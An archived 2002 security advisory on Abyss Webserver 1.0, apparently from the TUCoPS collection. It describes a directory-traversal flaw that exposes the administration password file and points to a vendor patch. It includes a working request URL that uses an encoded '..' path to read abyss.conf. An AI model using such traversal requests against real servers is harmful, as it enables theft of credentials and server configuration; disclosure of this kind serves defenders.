TUCoPS :: Web :: Servers :: web5256.htm

Abyss httpd 1.0 administration password file retrieval
11th Apr 2002 [SBWID-5256]
COMMAND

	Abyss httpd administration password file retrieval

SYSTEMS AFFECTED

	Abyss Webserver 1.0

PROBLEM

	In NETCRA$H SECURITY REPORT [http://www26.brinkster.com/netcrash/] :
	

	Request to get the password file just by breaking WWWROOT using  Unicode
	:
	

	http://127.0.0.1/cgi-bin/%2e%2e/abyss.conf

	

	

SOLUTION

	See http://www.aprelium.com for patch.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH